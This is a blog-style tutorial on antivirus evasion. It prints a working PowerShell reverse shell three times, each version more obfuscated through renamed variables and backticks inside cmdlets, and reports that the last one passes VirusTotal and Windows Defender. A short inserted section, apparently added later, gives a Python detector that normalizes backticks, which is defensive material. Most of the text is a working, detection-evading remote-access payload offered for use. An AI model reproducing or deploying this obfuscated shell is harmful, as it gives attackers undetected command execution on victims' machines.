From Detected to Undetected

Introduction

It's a boring weekend, and it's so cold outdoors. So let's play a little bit with VirusTotal.

What we are going to do right now is take a sample that antivirus engines detect and change it until it is undetected.

VirusTotal aggregates many antivirus products and online scan engines to check for viruses that the user's own antivirus may have missed, or to verify against any false positives. Antivirus software vendors can receive copies of files flagged by other scans but passed by their own engine to help improve their software.

Malicious Sample

Our sample of choice is the "PowerShell reverse shell", coded by Nikhil Mittal.

$client = New-Object System.Net.Sockets.TCPClient("127.0.0.1",443)
$stream = $client.GetStream()
[byte[]]$bytes = 0..255|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$sendback = (iex $data 2>&1 | Out-String )
$sendback2  = $sendback + "PS " + (pwd).Path + "> "
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()}
$client.Close()

First, let’s check our sample with VirusTotal for the first time, before doing anything.

VirusTotal’s result showed that 18 security vendors detected it. Let’s play now.

Playtime

The easiest thing we can do first is to change the names of the variables to random names.

$Melia = New-Object System.Net.Sockets.TCPClient("127.0.0.1",443)
$Plouton = $Melia.GetStream()
[byte[]]$bytes = 0..255|%{0}
while(($i = $Plouton.Read($bytes, 0, $bytes.Length)) -ne 0){
$Hekate = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$Tyr = (iex $Hekate 2>&1 | Out-String )
$Tyr2  = $Tyr + "PS " + (pwd).Path + "> "
$Lucretia = ([text.encoding]::ASCII).GetBytes($Tyr2)
$Plouton.Write($Lucretia,0,$Lucretia.Length)
$Plouton.Flush()}
$Melia.Close()

Let’s scan again now with our friend.

Fourteen security vendors flagged it as malicious on VirusTotal. Hmm, there is progress! With a few changes, we bypassed four vendors. Let's continue.

If we go to details in VirusTotal’s report, we will find the “Powershell Info” section. We will see that VirusTotal identifies the cmdlets used in our script.

The magic of `

Let's try adding backticks inside the commands. Then we'll see if VirusTotal can catch it or not.

PowerShell supports a set of special character sequences that are used to represent characters that aren't part of the standard character set. The sequences are commonly known as escape sequences.

Escape sequences begin with the backtick character, known as the grave accent (ASCII 96), and are case-sensitive. The backtick character can also be referred to as the escape character.

Escape sequences are only interpreted when contained in double-quoted (") strings.

Sequence    Description
`0          Null
`a          Alert
`b          Backspace
`e          Escape
`f          Form feed
`n          New line
`r          Carriage return
`t          Horizontal tab
`u{x}       Unicode escape sequence
`v          Vertical tab

So, we must be wary of where we set the backtick. We don't want to break our commands.

When we escape "a" with a backtick, it means alert (who`ami), and when we escape "f" with a backtick, it means form feed (ipcon`fig), so both commands break. When we escape any other character, the command doesn't break, because that character does not take on a special meaning.

To make the picture clear, see the following image.

Let's continue and add backticks to our code.

$Melia = nEW`-oBj`ECt System.Net.Sockets.TCPClient("127.0.0.1",443)
$Plouton = $Melia.GetStream()
[byte[]]$bytes = 0..255|%{0}
while(($i = $Plouton.Read($bytes, 0, $bytes.Length)) -ne 0){
$Hekate = (nEW`-oBj`ECt -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$Tyr = (I`Ex $Hekate 2>&1 | ouT`-St`RINg )
$Tyr2  = $Tyr + "PS " + (P`w`d).Path + "> "
$Lucretia = ([text.encoding]::ASCII).GetBytes($Tyr2)
$Plouton.Write($Lucretia,0,$Lucretia.Length)
$Plouton.Flush()}
$Melia.Close()

Upload it to VirusTotal again and scan it.

Really, I'm disappointed! We want to play more, but "No security vendors and no sandboxes flagged this file as malicious."

As shown in the result, VirusTotal does not detect the cmdlets that are used in our script! The backtick was helpful.
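Seen from the detection side, the backtick and mixed-case changes above stop mattering once bare words are normalized before matching. The following is an added example, not code from the original post: it drops backticks that precede a non-special character (per the escape table above), lowercases the word and then matches. The function names, the watchlist and the sample line are assumptions made for the illustration.

```python
import re

# Second characters of the escape sequences in the table above (case-sensitive).
# A backtick before any other character has no effect and can be dropped.
SPECIAL = set("0abefnrtuv")

# Constructed watchlist: the cmdlets and aliases this page's sample relies on.
WATCHLIST = {"new-object", "iex", "invoke-expression", "out-string", "pwd"}

# Bare words only: skip $variables and .members; allow backticks inside the word.
WORD = re.compile(r"(?<![\w$.])[A-Za-z`][\w`-]*")
DQ_STRING = re.compile(r'"(?:`.|[^"`])*"')  # double-quoted string literals


def normalize_word(word):
    """Remove no-op backticks from a bare word, then lowercase it."""
    out, i = [], 0
    while i < len(word):
        if word[i] == "`" and i + 1 < len(word) and word[i + 1] not in SPECIAL:
            i += 1  # drop the backtick, keep the character after it
            continue
        out.append(word[i])
        i += 1
    return "".join(out).lower()


def naive_scan(script):
    """Plain case-insensitive substring match, as a baseline."""
    lowered = script.lower()
    return sorted(name for name in WATCHLIST if name in lowered)


def scan(script):
    """Return (watchlist hits after normalization, count of backticked words)."""
    hits, ticked = set(), 0
    for word in WORD.findall(DQ_STRING.sub('""', script)):
        ticked += "`" in word
        name = normalize_word(word)
        if name in WATCHLIST:
            hits.add(name)
    return sorted(hits), ticked


# Constructed, harmless sample line using the same backtick and case tricks.
SAMPLE = "$x = nEW`-oBj`ECt System.Text.StringBuilder; (P`w`d).Path | ouT`-St`RINg"

if __name__ == "__main__":
    print("naive:", naive_scan(SAMPLE))
    print("normalized:", scan(SAMPLE))
```

The count of backticked bare words is a useful signal on its own, since ordinary scripts rarely put a backtick inside a command name.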

Test Time

It's time to test our code against Windows Defender and get a reverse shell, to make sure everything is working correctly.

It works fine.

Closing Words

Sometimes we don't need to do much to avoid antivirus software! We could bypass all the antivirus software by changing the variable names and adding some backticks to the code, as you saw above.
